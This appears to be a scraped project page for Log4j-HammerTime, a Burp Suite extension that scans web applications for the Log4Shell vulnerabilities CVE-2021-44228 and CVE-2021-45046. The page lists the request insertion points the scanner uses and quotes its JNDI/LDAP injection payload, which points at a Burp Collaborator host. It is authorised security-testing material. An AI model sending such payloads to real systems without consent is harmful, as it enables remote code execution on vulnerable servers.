Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046

Related tags

Overview

Log4j-HammerTime

This Burp Suite Active Scanner extension validates exploitation of the Apache Log4j CVE-2021-44228 and CVE-2021-45046 vulnerabilities.

This extension uses the Burp Collaborator to verify the issue.

Usage

Enable this extension
Launch an Active Scan on a specific target

if you want to run only checks from this module, you can import the extensions-only.json profile and select it as the Active Scan Profile.

Details

During an Active Scan, the following insertion points are tried in this extension:

HEADER
PARAM_NAME_BODY
PARAM_BODY
PARAM_NAME_URL
PARAM_URL
PARAM_COOKIE
PARAM_JSON
ENTIRE_BODY

At each insertion point, the request is injected with the following payload: ${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}

Moreover, this extension adds many headers which are enabled in headers (uncommented lines). These headers are injected one-by-one in a seperate request.

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of Log4Shell-active-scanner for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

License

The project is licensed under MIT License.

Authors

Freskimo

Copy Regex Matches is a Burp Suite plugin to copy regex matches from selected requests and/or responses to the clipboard.

Copy Regex Matches Copy Regex Matches is a Burp Suite plugin to copy regex matches from selected requests and/or responses to the clipboard. Install D

Dec 2, 2022

Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046

Related tags

Overview

Log4j-HammerTime

Usage

Details

Legal Disclaimer

License

Authors

You might also like...

Copy Regex Matches is a Burp Suite plugin to copy regex matches from selected requests and/or responses to the clipboard.

A handy plugin for copying requests/responses directly from Burp, some extra magic included.

Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928

Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j 2.10 and is unable to use

LOG4J Java exploit - WAF and patches bypass tricks

Examples and HowTos for BouncyCastle and Java Cryptography Extension (JCE)

Fixes the log4j exploit from being sent to Minecraft clients.

Copy as XMLHttpRequest BurpSuite extension

A small and easy-to-use one-time password generator library for Java according to RFC 4226 (HOTP) and RFC 6238 (TOTP).

Releases(v1.0)

v1.0(Dec 16, 2021)

Owner

DXC Technology - StrikeForce

log4j2-scan is a single binary command-line tool for CVE-2021-44228 vulnerability scanning and mitigation patch

CVE-2021-44228 (Apache Log4j Remote Code Execution）

Burp Extension for BFAC (Advanced Backup-File Artifacts Testing for Web-Applications)

OAUTHScan is a Burp Suite Extension written in Java with the aim to provide some automatic security checks

A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)

Log4Shell sample vulnerable application (CVE-2021-44228)

CVE-2021-44228 (Log4Shell) Proof of Concept

An LDAP RCE exploit for CVE-2021-44228 Log4Shell

PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs

Local Bytecode Scanner for the Log4JShell Vulnerability (CVE-2021-44228)